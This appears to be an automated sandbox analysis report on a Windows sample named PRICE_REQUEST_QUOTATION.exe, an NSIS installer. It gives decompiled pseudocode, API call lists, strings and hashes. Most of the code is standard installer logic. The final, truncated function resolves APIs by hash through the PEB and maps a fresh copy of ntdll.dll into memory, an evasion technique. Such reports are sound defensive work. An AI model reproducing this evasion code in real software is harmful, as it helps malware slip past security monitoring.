				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x6c0230
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x6c0230
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("jwfmxhqapdbzygp Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}

0x0040313b
0x0040313f
0x00403147
0x0040314b
0x00403150
0x00403160
0x00403163
0x0040316a
0x00403171
0x00403171
0x0040316a
0x00403173
0x00403173
0x00403289
0x00403289
0x00403289
0x0040328b
0x0040328d
0x00000000
0x00000000
0x00403222
0x00403225
0x0040322d
0x0040322d
0x00403230
0x00403235
0x00403237
0x00403237
0x00403238
0x00403238
0x0040323d
0x00403240
0x00403279
0x0040327e
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00000000
0x00403242
0x00403242
0x00403243
0x00403246
0x0040324e
0x00403251
0x00403253
0x00403253
0x00403253
0x00403253
0x00403251
0x00403258
0x0040325e
0x00403266
0x00403269
0x0040326b
0x0040326b
0x0040326b
0x0040326b
0x00403269
0x00403270
0x00403277
0x00403291
0x00403294
0x00403294
0x0040329d
0x004032a2
0x004032a2
0x004032ad
0x004032b3
0x004032b8
0x004032ba
0x004032e0
0x004032e5
0x004032ef
0x004032f6
0x004032fa
0x00403361
0x00403361
0x00403366
0x0040336c
0x00403370
0x00403485
0x0040348b
0x00403528
0x00403528
0x0040352d
0x00403530
0x00403532
0x00403532
0x0040353a
0x0040353a
0x0040349a
0x004034a3
0x004034a5
0x004034aa
0x004034ac
0x004034ae
0x004034b0
0x004034b2
0x004034b4
0x004034b6
0x004034c6
0x004034c8
0x004034ca
0x004034d7
0x004034e6
0x004034ee
0x004034f6
0x004034f6
0x004034ca
0x004034b6
0x004034b2
0x004034fa
0x004034ff
0x00403506
0x00403514
0x00403517
0x0040351d
0x0040351f
0x00000000
0x00000000
0x00000000
0x00403508
0x0040350e
0x00403510
0x00403512
0x00403521
0x00403523
0x00000000
0x00403523
0x00000000
0x00403512
0x00403506
0x0040337f
0x00403386
0x00403386
0x004032fc
0x00403302
0x00403351
0x00403351
0x0040335d
0x00000000
0x0040335d
0x0040330b
0x00403318
0x0040330f
0x00403315
0x00000000
0x00000000
0x00403317
0x00403317
0x00403317
0x0040331c
0x0040331e
0x00403326
0x00403397
0x00403399
0x004033a0
0x004033a8
0x004033a8
0x004033b3
0x004033b8
0x004033c7
0x004033cb
0x004033cc
0x004033d5
0x004033ce
0x004033ce
0x004033ce
0x004033db
0x004033e1
0x004033e7
0x004033ef
0x004033ef
0x004033fd
0x00403404
0x0040340d
0x00403413
0x00403413
0x0040341f
0x00403425
0x0040342f
0x00403439
0x0040343f
0x00403441
0x00403443
0x00403444
0x00403445
0x0040344a
0x00403456
0x0040345c
0x00403463
0x00403466
0x0040346c
0x0040346c
0x00403463
0x00403441
0x00403470
0x00403476
0x00403476
0x00403476
0x00403479
0x0040347a
0x0040347b
0x0040347b
0x00000000
0x004033c7
0x00403328
0x0040332a
0x00403335
0x00000000
0x00000000
0x0040333d
0x00403348
0x0040334d
0x00000000
0x0040334d
0x004032c2
0x004032ce
0x004032d3
0x004032d8
0x004032da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00403277
0x00000000
0x00000000
0x00000000
0x00403227
0x00403227
0x00403227
0x00403228
0x00403228
0x00000000
0x00403227
0x00000000
0x00403178
0x00403179
0x00403185
0x0040318b
0x00000000
0x0040318d
0x0040318f
0x00403196
0x0040319b
0x004031a0
0x004031a7
0x004031ad
0x004031c3
0x004031d3
0x004031d8
0x004031de
0x004031e5
0x004031f8
0x004031fd
0x004031ff
0x00403201
0x00403206
0x00403206
0x00403216
0x0040321c
0x00000000
0x0040321c

APIs

SetErrorMode.KERNELBASE ref: 00403150
GetVersion.KERNEL32 ref: 00403156
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
#17.COMCTL32(0000000B,0000000D), ref: 004031A0
OleInitialize.OLE32(00000000), ref: 004031A7
SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
GetCommandLineA.KERNEL32(jwfmxhqapdbzygp Setup,NSIS Error), ref: 004031D8
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000), ref: 004031EB
CharNextA.USER32(00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00409168), ref: 00403216
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
DeleteFileA.KERNELBASE(1033), ref: 004032E5

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

OleUninitialize.OLE32(00000020), ref: 00403366
ExitProcess.KERNEL32 ref: 00403386
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 00403399
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 004033A8
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 004033B3
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 004033BF
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
CopyFileA.KERNEL32(C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,00428C58,00000001), ref: 00403439
CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
ExitWindowsEx.USER32 ref: 00403517
ExitProcess.KERNEL32 ref: 0040353A

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00403298, 00403338, 004033E1, 004033EA
/D=, xrefs: 00403270
NSIS Error, xrefs: 004031C9
1033, xrefs: 004032E0
C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe, xrefs: 00403434
~nsu, xrefs: 00403391
C:\Users\user\AppData\Local\Temp, xrefs: 00403343
, xrefs: 0040314B
SeShutdownPrivilege, xrefs: 004034D1
Error launching installer, xrefs: 0040331E
NCRC, xrefs: 00403258
UXTHEME, xrefs: 00403173, 00403178, 0040317E
_?=, xrefs: 0040330F
", xrefs: 00403238
.tmp, xrefs: 004033AD
\Temp, xrefs: 004032C8
C:\Users\user\Desktop, xrefs: 004033B8, 004033BD, 004033E9
"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 004031DE, 004031E4, 00403305
C:\Users\user\AppData\Local\Temp\, xrefs: 004032A2, 004032A7, 004032C1, 004032CD, 00403396, 004033A7, 004033B2, 004033BE, 004033CB, 004033DA, 0040347A
jwfmxhqapdbzygp Setup, xrefs: 004031CE

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$jwfmxhqapdbzygp Setup$~nsu
API String ID: 3469842172-1539685952
Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004054f7
0x004054fb
0x00405504
0x00405507
0x0040550a
0x00405512
0x00405514
0x00405515
0x00000000
0x00405515
0x00405524
0x00405524
0x00405527
0x0040552a
0x0040553e
0x00405545
0x0040554a
0x0040554c
0x0040555c
0x0040554e
0x00405554
0x00405554
0x00405561
0x00405564
0x0040556f
0x00405575
0x0040557a
0x0040558a
0x0040558c
0x00405592
0x00405595
0x00405598
0x00405655
0x00405655
0x00405659
0x0040565b
0x0040565b
0x0040565b
0x0040565b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040559e
0x0040559e
0x004055a7
0x004055ad
0x004055b2
0x004055b5
0x004055b7
0x004055bb
0x004055bd
0x004055bd
0x004055bb
0x004055c0
0x004055c3
0x004055d6
0x004055d8
0x004055dd
0x004055e4
0x004055fc
0x00405602
0x00405608
0x0040560a
0x0040562f
0x0040560c
0x0040560c
0x00405610
0x00405624
0x00405612
0x00405615
0x0040561d
0x0040561d
0x00405610
0x004055e6
0x004055ec
0x004055ee
0x004055f4
0x004055f4
0x004055ee
0x00000000
0x004055e4
0x004055c5
0x004055c8
0x004055ca
0x00000000
0x00000000
0x004055cc
0x004055ce
0x00000000
0x00000000
0x004055d0
0x004055d4
0x00000000
0x00000000
0x00000000
0x00405634
0x0040563e
0x00405644
0x00405644
0x0040564f
0x00000000
0x0040564f
0x00405566
0x0040556d
0x00000000
0x00000000
0x00000000
0x0040552c
0x0040552c
0x0040552e
0x0040565f
0x00405662
0x00405665
0x004056b7
0x004056b7
0x004056b7
0x00405667
0x0040566a
0x00405675
0x0040567a
0x0040567c
0x00000000
0x00000000
0x0040567f
0x00405685
0x0040568b
0x00405691
0x00405693
0x00000000
0x004056af
0x00405695
0x00405699
0x00000000
0x00000000
0x0040569e
0x00000000
0x004056a5
0x0040566c
0x0040566c
0x00000000
0x0040566c
0x00405534
0x00405538
0x00000000
0x00000000
0x00000000
0x00405538

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
FindClose.KERNEL32(?), ref: 0040564F

Strings

\*.*, xrefs: 0040554E
"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 004054EC
C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2409741021
Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD

Uniqueness

Uniqueness Score: -1.00%

Function 7333A402, Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E7333A402(void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _t60;
				short _t61;
				short _t62;
				void* _t78;
				void* _t79;
				void _t81;
				long _t86;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t102;
				short _t103;
				short _t120;
				signed int _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;

				_t142 = __eflags;
				_t60 = 0x6e;
				_v60 = _t60;
				_t100 = 0;
				_t61 = 0x74;
				_t103 = 0x64;
				_t120 = 0x6c;
				_v58 = _t61;
				_t62 = 0x2e;
				_v50 = _t62;
				_v56 = _t103;
				_v54 = _t120;
				_v52 = _t120;
				_v48 = _t103;
				_v46 = _t120;
				_v44 = _t120;
				_v42 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E7333A776( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
				_v16 = E7333A776( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
				_v12 = E7333A776(_t137, 0x7fb47add);
				_v32 = E7333A776(_t137, 0x7fe7f840);
				_v24 = E7333A776(_t137, 0x7fe1f1fb);
				_v28 = E7333A776(_t137, 0x7f951704);
				_v36 = E7333A776(_t137, 0x7f91a078);
				_t78 = CreateFileW(E7333A744( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t138 = _t78;
				_v20 = _t138;
				if(_t138 == 0xffffffff) {
					L13:
					_t139 = _t100;
					L14:
					_t79 = _v20;
					__eflags = _t79;
					if(_t79 != 0) {
						_v24(_t79);
					}
					_v36(0);
					L22:
					while( *_t100 != 0xb8) {
						_t81 =  *_t100;
						__eflags = _t81 - 0xe9;
						if(_t81 != 0xe9) {
							__eflags = _t81 - 0xea;
							if(_t81 != 0xea) {
								_t100 = _t100 + 1;
								__eflags = _t100;
							} else {
								_t100 =  *(_t100 + 1);
							}
						} else {
							_t100 = _t100 + 5 +  *(_t100 + 1);
						}
					}
					_t135 =  *(_t100 + 1);
					if(_t139 != 0) {
						VirtualFree(_t139, 0, 0x8000);
					}
					return _t135;
				}
				_t86 = _v16(_t138, 0);
				_v16 = _t86;
				if(_t86 == 0xffffffff) {
					goto L13;
				}
				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
					goto L13;
				} else {
					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
					_v8 = _t91;
					if(_t91 == 0) {
						_t139 = _t91;
						goto L14;
					}
					E7333A6DB(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
					_v12 = _v12 & 0;
